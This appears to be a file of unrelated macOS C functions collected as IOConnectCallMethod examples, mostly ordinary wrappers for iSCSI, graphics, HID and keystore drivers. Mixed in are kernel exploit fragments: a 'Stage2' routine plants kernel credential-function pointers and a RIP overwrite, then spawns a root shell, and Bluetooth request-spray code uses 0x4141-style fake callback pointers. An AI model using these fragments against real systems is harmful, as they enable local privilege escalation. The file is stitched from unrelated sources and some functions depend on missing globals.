void enkript_prologue(void)
{
if (IOConnectCallMethod == NULL) die("IOConnectCallMethod unavailable, require version >= 10.5");
/* get iterator to browse drivers of the chosen class
*/
io_iterator_t iterator;
if (IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("com_enkript_driver_Service"), &iterator) != KERN_SUCCESS) die("IOServiceGetMatchingServices failed");
/* browse drivers
*/
for (io_service_t service = IOIteratorNext(iterator); service != IO_OBJECT_NULL; service = IOIteratorNext(iterator))
{
debug("com_enkript_driver_Service instance found!");
/* open service
*/
io_connect_t connect = IO_OBJECT_NULL;
if (IOServiceOpen(service, mach_task_self(), 0, &connect) != KERN_SUCCESS) die("IOServiceOpen failed");
/* call driver's open method
*/
if (IOConnectCallMethod(connect, 0 /* open, TOFIX */, NULL, 0, NULL, 0, NULL, NULL, NULL, NULL) != KERN_SUCCESS) die("IOConnectCallMethod failed");
/* call driver's hello method
*/
uint64_t buf = getpid();
if (IOConnectCallMethod(connect, 2 /* hello, TOFIX */, &buf, 1, NULL, 0, NULL, NULL, NULL, NULL) != KERN_SUCCESS) die("IOConnectCallMethod failed");
/* call driver's close method
*/
if (IOConnectCallMethod(connect, 1 /* close, TOFIX */, NULL, 0, NULL, 0, NULL, NULL, NULL, NULL) != KERN_SUCCESS) die("IOConnectCallMethod failed");
/* close service
*/
if (IOServiceClose(connect) != KERN_SUCCESS) die("IOServiceClose failed");
}
IOObjectRelease(iterator);
}
/*! Receives data over a kernel socket associated with iSCSI.
* @param sessionId the qualifier part of the ISID (see RFC3720).
* @param connectionId the connection associated with the session.
* @param bhs the basic header segment received over the connection.
* @param data the data segment of the PDU received over the connection.
* @param length the length of the data block received.
* @return error code indicating result of operation. */
errno_t iSCSIKernelRecv(SID sessionId,
CID connectionId,
iSCSIPDUTargetBHS * bhs,
void ** data,
size_t * length)
{
// Check parameters
if(sessionId == kiSCSIInvalidSessionId || connectionId == kiSCSIInvalidConnectionId || !bhs)
return EINVAL;
// Setup input scalar array
const UInt32 inputCnt = 2;
UInt64 inputs[] = {sessionId,connectionId};
size_t bhsLength = sizeof(iSCSIPDUTargetBHS);
// Call kernel method to determine how much data there is to receive
// The inputs are the sesssion qualifier and connection ID
// The output is the size of the buffer we need to allocate to hold the data
kern_return_t result;
result = IOConnectCallMethod(connection,kiSCSIRecvBHS,inputs,inputCnt,NULL,0,
NULL,NULL,bhs,&bhsLength);
if(result != kIOReturnSuccess)
return IOReturnToErrno(result);
// Determine how much data to allocate for the data buffer
*length = iSCSIPDUGetDataSegmentLength((iSCSIPDUCommonBHS *)bhs);
// If no data, were done at this point
if(*length == 0)
return 0;
*data = iSCSIPDUDataCreate(*length);
if(*data == NULL)
return EIO;
// Call kernel method to get data from a receive buffer
result = IOConnectCallMethod(connection,kiSCSIRecvData,inputs,inputCnt,NULL,0,
NULL,NULL,*data,length);
// If we failed, free the temporary buffer and quit with error
if(result != kIOReturnSuccess)
iSCSIPDUDataRelease(data);
return IOReturnToErrno(result);
}
/* Flush surface to visible region */
IOReturn IOAccelFlushSurfaceOnFramebuffers( IOAccelConnect connect, IOOptionBits options, UInt32 framebufferMask )
{
uint64_t inData[] = { framebufferMask, options };
return IOConnectCallMethod((io_connect_t) (uintptr_t) connect, kIOAccelSurfaceFlush,
inData, arrayCnt(inData), NULL, 0,// input
NULL, NULL, NULL, NULL); // output
}
IOReturn IOAccelWriteUnlockSurfaceWithOptions( IOAccelConnect connect, IOOptionBits options )
{
uint64_t inData = options;
return IOConnectCallMethod((io_connect_t) (uintptr_t) connect, kIOAccelSurfaceWriteUnlockOptions,
&inData, 1, NULL, 0, // input
NULL, NULL, NULL, NULL); // output
}
static io_connect_t connect_to_keystore(void)
{
io_registry_entry_t apple_key_bag_service;
kern_return_t result;
io_connect_t keystore = MACH_PORT_NULL;
apple_key_bag_service = IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching(kAppleKeyStoreServiceName));
if (apple_key_bag_service == IO_OBJECT_NULL) {
fprintf(stderr, "Failed to get service.\n");
return keystore;
}
result = IOServiceOpen(apple_key_bag_service, mach_task_self(), 0, &keystore);
if (KERN_SUCCESS != result)
fprintf(stderr, "Failed to open keystore\n");
if (keystore != MACH_PORT_NULL) {
IOReturn kernResult = IOConnectCallMethod(keystore,
kAppleKeyStoreUserClientOpen, NULL, 0, NULL, 0, NULL, NULL,
NULL, NULL);
if (kernResult) {
fprintf(stderr, "Failed to open AppleKeyStore: %x\n", kernResult);
}
}
return keystore;
}
kern_return_t
fake_IOConnectCallMethod(
mach_port_t connection, // In
uint32_t selector, // In
/*const*/ uint64_t *input, // In
uint32_t inputCnt, // In
/*const*/ void *inputStruct, // In
size_t inputStructCnt, // In
uint64_t *output, // Out
uint32_t *outputCnt, // In/Out
void *outputStruct, // Out
size_t *outputStructCntP) // In/Out
{
kern_return_t ret = 0;
ret = IOConnectCallMethod(
connection,
selector,
input,
inputCnt,
inputStruct,
inputStructCnt,
output,
outputCnt,
outputStruct,
outputStructCntP);
return ret;
}
// logging metadata, contains e.g. size of log1, pointer to current entry etc.
// 0xc == AGCDebug
static BOOL dumpLog0(io_connect_t connect) {
kern_return_t kernResult;
uint8_t buffer[0x100];
uint64_t scalarI_64[2] = { (uint64_t) buffer, 0x100 };
kernResult = IOConnectCallMethod(connect, // an io_connect_t returned from IOServiceOpen().
kGetAGCData, // selector of the function to be called via the user client.
scalarI_64, // array of scalar (64-bit) input values.
2, // the number of scalar input values.
NULL, // a pointer to the struct input parameter.
0, // the size of the input structure parameter.
NULL, // array of scalar (64-bit) output values.
NULL, // pointer to the number of scalar output values.
NULL, // pointer to the struct output parameter.
NULL // pointer to the size of the output structure parameter.
);
if (kernResult == KERN_SUCCESS) {
printf("getMuxState was successful.\n");
int i;
for (i=0; i < 0x100; i++) {
printf("0x%x: 0x%x\n", i, buffer[i]);
}
} else {
printf("getMuxState returned 0x%08x.\n", kernResult);
}
return kernResult == KERN_SUCCESS;
}
void create_requests(io_connect_t port)
{
struct BluetoothCall a;
uint32_t i;
kern_return_t kr;
for (i = 0; i < 7; i++) {
a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
a.sizes[i] = SIZE;
}
/* DispatchHCIRequestCreate() */
a.index = 0x0;
*(uint64_t *)a.args[0] = 5*1000; /* Timeout */
memset((void *)a.args[1], 0x81, 0x1000);
memset((void *)a.args[2], 0x82, 0x1000);
memset((void *)a.args[3], 0x83, 0x1000);
memset((void *)a.args[4], 0x84, 0x1000);
memset((void *)a.args[5], 0x85, 0x1000);
memset((void *)a.args[6], 0x86, 0x1000);
for(i = 0; i < 500; i++) {
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
120, /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
if(kr == 0xe00002bd) /* Full */
break;
}
}
/*! Gets an array of connection identifiers for each session.
* @param sessionId session identifier.
* @param connectionIds an array of connection identifiers for the session.
* @param connectionCount number of connection identifiers.
* @return error code indicating result of operation. */
errno_t iSCSIKernelGetConnectionIds(SID sessionId,
CID * connectionIds,
UInt32 * connectionCount)
{
if(sessionId == kiSCSIInvalidSessionId || !connectionIds || !connectionCount)
return EINVAL;
const UInt32 inputCnt = 1;
UInt64 input = sessionId;
const UInt32 expOutputCnt = 1;
UInt64 output;
UInt32 outputCnt = expOutputCnt;
*connectionCount = 0;
size_t outputStructSize = sizeof(CID)*kiSCSIMaxConnectionsPerSession;
kern_return_t result =
IOConnectCallMethod(connection,kiSCSIGetConnectionIds,&input,inputCnt,0,0,
&output,&outputCnt,connectionIds,&outputStructSize);
if(result == kIOReturnSuccess && outputCnt == expOutputCnt)
*connectionCount = (UInt32)output;
return IOReturnToErrno(result);
}
krb5_error_code
kcm_create_key(krb5_uuid uuid)
{
io_connect_t conn;
createKeyGetUUID_InStruct_t createKey;
kern_return_t kr;
uuid_OutStruct_t key;
size_t outputStructSize = sizeof(key);
conn = openiodev();
if (conn == IO_OBJECT_NULL)
return EINVAL;
createKey.keySizeInBytes = V1_KEYSIZE;
createKey.algorithm = fDE_ALG_AESXTS;
memset(&key, 0, sizeof(key));
kr = IOConnectCallMethod(conn, kAppleFDEKeyStore_createKeyGetUUID,
NULL, 0,
&createKey, sizeof(createKey),
NULL, 0,
&key, &outputStructSize);
closeiodev(conn);
if (kr != KERN_SUCCESS)
return EINVAL;
memcpy(uuid, key.uuid, sizeof(key.uuid));
return 0;
}
/*! Sends data over a kernel socket associated with iSCSI.
* @param sessionId the qualifier part of the ISID (see RFC3720).
* @param connectionId the connection associated with the session.
* @param bhs the basic header segment to send over the connection.
* @param data the data segment of the PDU to send over the connection.
* @param length the length of the data block to send over the connection.
* @return error code indicating result of operation. */
errno_t iSCSIKernelSend(SID sessionId,
CID connectionId,
iSCSIPDUInitiatorBHS * bhs,
void * data,
size_t length)
{
// Check parameters
if(sessionId == kiSCSIInvalidSessionId || connectionId == kiSCSIInvalidConnectionId || !bhs || (!data && length > 0))
return EINVAL;
// Setup input scalar array
const UInt32 inputCnt = 2;
const UInt64 inputs[] = {sessionId, connectionId};
// Call kernel method to send (buffer) bhs and then data
kern_return_t result;
result = IOConnectCallStructMethod(connection,kiSCSISendBHS,bhs,
sizeof(iSCSIPDUInitiatorBHS),NULL,NULL);
if(result != kIOReturnSuccess)
return IOReturnToErrno(result);
return IOReturnToErrno(IOConnectCallMethod(connection,kiSCSISendData,inputs,inputCnt,
data,length,NULL,NULL,NULL,NULL));
}
/*! Looks up the connection identifier associated with a particular portal address.
* @param sessionId the session identifier.
* @param portalAddress the address passed to iSCSIKernelCreateSession() or
* iSCSIKernelCreateConnection() when the connection was created.
* @return the associated connection identifier. */
CID iSCSIKernelGetConnectionIdForPortalAddress(SID sessionId,
CFStringRef portalAddress)
{
if(sessionId == kiSCSIInvalidSessionId || !portalAddress)
return EINVAL;
const UInt32 inputCnt = 1;
UInt64 input = sessionId;
const UInt32 expOutputCnt = 1;
UInt64 output[expOutputCnt];
UInt32 outputCnt = expOutputCnt;
kern_return_t result =
IOConnectCallMethod(connection,kiSCSIGetConnectionIdForPortalAddress,
&input,inputCnt,
CFStringGetCStringPtr(portalAddress,kCFStringEncodingASCII),
CFStringGetLength(portalAddress)+1,
output,&outputCnt,0,0);
if(result != kIOReturnSuccess || outputCnt != expOutputCnt)
return kiSCSIInvalidConnectionId;
return (CID)output[0];
}
void test_io_connect_method(io_connect_t conn, int selector, uint64_t* scalar_input,
uint32_t scalar_input_cnt,
unsigned char* struct_input, size_t struct_input_cnt, int scalar_output_cnt,
int struct_output_cnt) {
uint64_t outputScalar[16];
uint32_t outputScalarCnt = scalar_output_cnt;
char outputStruct[4096];
size_t outputStructCnt = struct_output_cnt;
int index = selector;
printf("IOConnectCall (selector = %d)\n", index);
//getchar();
kern_return_t err = IOConnectCallMethod(
conn,
index,
scalar_input,
scalar_input_cnt,
struct_input,
struct_input_cnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf("IOConnectCall (%d) error: %x\n", index, err);
}
}
static BOOL dumpLog1(io_connect_t connect) {
kern_return_t kernResult;
uint8_t buffer[LOGSIZE];
uint64_t scalarI_64[2] = { (uint64_t) buffer, LOGSIZE };
kernResult = IOConnectCallMethod(connect, // an io_connect_t returned from IOServiceOpen().
kGetAGCData_log1, // selector of the function to be called via the user client.
scalarI_64, // array of scalar (64-bit) input values.
2, // the number of scalar input values.
NULL, // a pointer to the struct input parameter.
0, // the size of the input structure parameter.
NULL, // array of scalar (64-bit) output values.
NULL, // pointer to the number of scalar output values.
NULL, // pointer to the struct output parameter.
NULL // pointer to the size of the output structure parameter.
);
if (kernResult == KERN_SUCCESS) {
printf("getMuxState was successful.\n");
FILE *logfile;
logfile = fopen("log.bin", "wb");
if (!logfile) {
printf("cannot open file\n");
} else {
fwrite(buffer, sizeof(uint8_t), LOGSIZE, logfile);
fclose(logfile);
}
} else {
printf("getMuxState returned 0x%08x.\n", kernResult);
}
return kernResult == KERN_SUCCESS;
}
kern_return_t
IOHIDSetCursorEnable( io_connect_t connect,
boolean_t enable )
{
uint64_t inData = enable;
return IOConnectCallMethod( connect, 2, // Index
&inData, 1, NULL, 0, // Input
NULL, NULL, NULL, NULL); // Output
}
int Stage2(void)
{
int i;
unsigned char *p;
unsigned char *p_ptr;
kern_return_t k_error;
char UselessStruct[4096];
size_t UselessStructSize = 0x14;
p = (unsigned char*)mem;
p_ptr = p + OFFSET_ROOM;
printf("Stage2: preparing the stage2 payload \n");
unsigned char *t = (unsigned char*)&stage2;
*(uint64_t*)(t + OFF_API_CURRENT_PROC) = api_current_proc;
*(uint64_t*)(t + OFF_API_PROC_UCRED) = api_proc_ucred;
*(uint64_t*)(t + OFF_API_POSIX_CRED_GET) = api_posix_cred_get;
*(uint64_t*)(t + OFF_API_CHGPROCCNT) = api_chgproccnt;
printf("Stage2: Copying the stage2 payload 0x%08x - 0x%08lx \n", PAYLOAD_MEM_START, PAYLOAD_MEM_START + sizeof(stage1));
memcpy((void*)(p + PAYLOAD_MEM_START), (void*)&stage2, sizeof(stage2));
printf("Stage2: Setting up the RIP to 0x%08x \n", PAYLOAD_MEM_START);
*(uint64_t*)(p + OFFSET_PAYLOAD_EXEC) = PAYLOAD_MEM_START;
printf("Stage2: Copying trigger data \n");
*(uint64_t*)p_ptr = INIT_SIG;
printf("Stage2: Making stage2 call\n");
k_error = IOConnectCallMethod(conn, 0x5, 0, 0, p_ptr, 0x8c, 0, 0, &UselessStruct, &UselessStructSize);
setuid(0);
if (getuid() == 0)
{
printf("Stage2: success, got root! \n");
printf("Stage2: now executing shell \n");
system("/bin/sh");
exit(0);
}
printf("Stage2: failed! \n");
return -1;
}
extern kern_return_t
IOHIDSetCursorBounds( io_connect_t connect, const IOGBounds * bounds )
{
if ( !bounds )
return kIOReturnBadArgument;
return IOConnectCallMethod(connect, 6, // Index
NULL, 0, bounds, sizeof(*bounds), // Input,
NULL, NULL, NULL, NULL); // Output
}
IOReturn IOAccelReadSurface( IOAccelConnect connect, IOAccelSurfaceReadData * parameters )
{
IOReturn result;
result = IOConnectCallMethod((io_connect_t) (uintptr_t) connect, kIOAccelSurfaceRead,
NULL, 0, parameters, sizeof( IOAccelSurfaceReadData), // input
NULL, NULL, NULL, NULL); // no output
return result;
}
uint64_t map_user_memory(mach_port_t conn) {
kern_return_t err;
void* mem = malloc(0x20000);
// make sure that the address we pass is page-aligned:
mem = (void*) ((((uint64_t)mem)+0x1000)&~0xfff);
printf("trying to map user pointer: %p\n", mem);
uint64_t inputScalar[16] = {0};
uint64_t inputScalarCnt = 0;
char inputStruct[4096] = {0};
size_t inputStructCnt = 0;
uint64_t outputScalar[16] = {0};
uint32_t outputScalarCnt = 0;
char outputStruct[4096] = {0};
size_t outputStructCnt = 0;
inputScalarCnt = 0;
inputStructCnt = 0x10;
outputScalarCnt = 4096;
outputStructCnt = 16;
struct mem_desc* md = (struct mem_desc*)inputStruct;
md->ptr = (uint64_t)mem;
md->size = 0x1000;
err = IOConnectCallMethod(
conn,
0x200, // IGAccelGLContext::map_user_memory
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf("IOConnectCall error: %x\n", err);
//return 0;
} else{
printf("worked? outputScalarCnt = %d\n", outputScalarCnt);
}
printf("outputScalarCnt = %d\n", outputScalarCnt);
md = (struct mem_desc*)outputStruct;
printf("0x%llx :: 0x%llx\n", md->ptr, md->size);
return (uint64_t)mem;
}
kern_return_t
IOHIDSetFixedMouseLocation( io_connect_t connect, int32_t x, int32_t y )
{
int32_t data[3] = {x, y, 0};
data[2] = getpid();
return IOConnectCallMethod(connect, 4, // Index
NULL, 0, data, sizeof(data), // Input
NULL, NULL, NULL, NULL); // Output
}
static void
closeiodev(io_connect_t conn)
{
kern_return_t kr;
kr = IOConnectCallMethod(conn, kAppleFDEKeyStoreUserClientClose, NULL, 0, NULL, 0, NULL, NULL, NULL, NULL);
if (kr != KERN_SUCCESS)
return;
IOServiceClose(conn);
}
kern_return_t
IOHIDPostEvent( io_connect_t connect,
UInt32 eventType,
IOGPoint location,
const NXEventData * eventData,
UInt32 eventDataVersion,
IOOptionBits eventFlags,
IOOptionBits options )
{
int * eventPid = 0;
size_t dataSize = sizeof(struct evioLLEvent) + sizeof(int);
char data[dataSize];
struct evioLLEvent* event;
UInt32 eventDataSize = sizeof(NXEventData);
bzero(data, dataSize);
event = (struct evioLLEvent*)data;
event->type = eventType;
event->location = location;
event->flags = eventFlags;
event->setFlags = options;
event->setCursor = options & (kIOHIDSetCursorPosition | kIOHIDSetRelativeCursorPosition);
eventPid = (int *)(event + 1);
*eventPid = getpid();
if ( eventDataVersion < 2 )
{
// Support calls from legacy IOHIDPostEvent clients.
// 1. NXEventData was 32 bytes long.
// 2. eventDataVersion was (boolean_t) setCursor
eventDataSize = 32;
event->setCursor = eventDataVersion; // 0 or 1
}
if ( eventDataSize < sizeof(event->data) )
{
bcopy( eventData, &(event->data), eventDataSize );
bzero( ((UInt8 *)(&(event->data))) + eventDataSize,
sizeof(event->data) - eventDataSize );
}
else
bcopy( eventData, &event->data, sizeof(event->data) );
// Let PM log the software HID events
_IOPMReportSoftwareHIDEvent(event->type);
return IOConnectCallMethod(connect, 3, // Index
NULL, 0, data, dataSize, // Input
NULL, NULL, NULL, NULL); // Output
}
static CFDataRef create_keybag(keybag_handle_t bag_type, CFDataRef password)
{
uint64_t inputs[] = { bag_type };
uint64_t outputs[] = {0};
uint32_t num_inputs = array_size(inputs);
uint32_t num_outputs = array_size(outputs);
IOReturn kernResult;
io_connect_t keystore;
unsigned char keybagdata[4096]; //Is that big enough?
size_t keybagsize=sizeof(keybagdata);
keystore=connect_to_keystore();
kernResult = IOConnectCallMethod(keystore,
kAppleKeyStoreKeyBagCreate,
inputs, num_inputs, NULL, 0,
outputs, &num_outputs, NULL, 0);
if (kernResult) {
fprintf(stderr, "kAppleKeyStoreKeyBagCreate: 0x%x\n", kernResult);
return NULL;
}
/* Copy out keybag */
inputs[0]=outputs[0];
num_inputs=1;
kernResult = IOConnectCallMethod(keystore,
kAppleKeyStoreKeyBagCopy,
inputs, num_inputs, NULL, 0,
NULL, 0, keybagdata, &keybagsize);
if (kernResult) {
fprintf(stderr, "kAppleKeyStoreKeyBagCopy: 0x%x\n", kernResult);
return NULL;
}
return CFDataCreate(kCFAllocatorDefault, keybagdata, keybagsize);
}
void create_requests(io_connect_t port)
{
BluetoothCall a;
BluetoothHCIRequestCallbackInfo cb;
uint32_t i;
kern_return_t kr;
for (i=0; i<7; i++) {
a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
a.sizes[i] = SIZE;
}
/* DispatchHCIRequestCreate() */
a.index = 0x0;
*(uint64_t *)a.args[0] = 5432; /* Timeout */
*(uint64_t *)a.args[1] = 1; /* DoAsyncNotify */
cb.userCallback = (uint64_t *)0x4141414141414141;
cb.userRefCon = (uint64_t *)0x4242424242424242;
cb.internalRefCon = (uint64_t *)0x4343434343434343;
cb.asyncIDRefCon = (uint64_t *)0x4444444444444444;
cb.reserved = (uint64_t *)0x4545454545454545;
a.args[2] = (uint64_t)&cb; /* CallbackInfo */
a.sizes[2] = sizeof(cb);
*(uint64_t *)a.args[3] = 0; /* This appears to be ignored */
*(uint64_t *)a.args[4] = 0; /* outRequestId (no real need to
set it, just a reminder */
#ifdef DEBUG
for(i = 0; i<120; i++) {
if(i % 8 == 0) printf("\n");
printf("\\x%02x", ((unsigned char *)&a)[i]);
}
printf("\n");
#endif
for(i = 0; i < 500; i++) {
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
120, /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
/* Max number of requests reached */
if(kr == 0xe00002bd)
break;
}
printf(" [+] Created %d requests!\n", i);
}
extern kern_return_t
IOHIDSetOnScreenCursorBounds( io_connect_t connect, const IOGPoint * point, const IOGBounds * bounds )
{
if ( !bounds || !point )
return kIOReturnBadArgument;
int16_t data[6] = {point->x, point->y, bounds->minx, bounds->miny, bounds->maxx, bounds->maxy};
return IOConnectCallMethod(connect, 12, // Index
NULL, 0, data, sizeof(data), // Input,
NULL, NULL, NULL, NULL); // Output
}
IOReturn IOAccelWriteLockSurfaceWithOptions( IOAccelConnect connect, IOOptionBits options,
IOAccelSurfaceInformation * info, UInt32 infoSize )
{
uint64_t inData = options;
size_t size = (size_t) infoSize;
IOReturn ret = IOConnectCallMethod((io_connect_t) (uintptr_t) connect, kIOAccelSurfaceWriteLockOptions,
&inData, 1, // in scalar
NULL, 0, // in struct
NULL, NULL, // out scalar
info, &size); // out struct
return ret;
}
kern_return_t
IOHIDCreateSharedMemory( io_connect_t connect,
unsigned int version )
{
#if !TARGET_OS_EMBEDDED
IOFramebufferServerStart();
#endif
uint64_t inData = version;
return IOConnectCallMethod( connect, 0, // Index
&inData, 1, NULL, 0, // Input
NULL, NULL, NULL, NULL); // Output
}
IOReturn IOAccelSetSurfaceFramebufferShape( IOAccelConnect connect, IOAccelDeviceRegion *rgn,
eIOAccelSurfaceShapeBits options, UInt32 framebufferIndex )
{
uint64_t inData[] = { options, framebufferIndex };
IOReturn result;
size_t rgnSize = regionSize(rgn);
result = IOConnectCallMethod((io_connect_t) (uintptr_t) connect, kIOAccelSurfaceSetShape,
inData, arrayCnt(inData), rgn, rgnSize,
NULL, NULL, NULL, NULL); // no output
return result;
}
void make_iokit_call(){
IOConnectCallMethod(
global_conn,
selector,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
}
kern_return_t
IOHIDSetVirtualDisplayBounds( io_connect_t handle, UInt32 display_token, const IOGBounds * bounds )
{
kern_return_t err;
uint64_t inData[5] = {display_token, bounds->minx, bounds->maxx, bounds->miny, bounds->maxy};
uint32_t outCount = 0;
err = IOConnectCallMethod(handle, 9, // Index
inData, 5, NULL, 0, // Input
NULL, &outCount, NULL, NULL); // Output
return err;
}
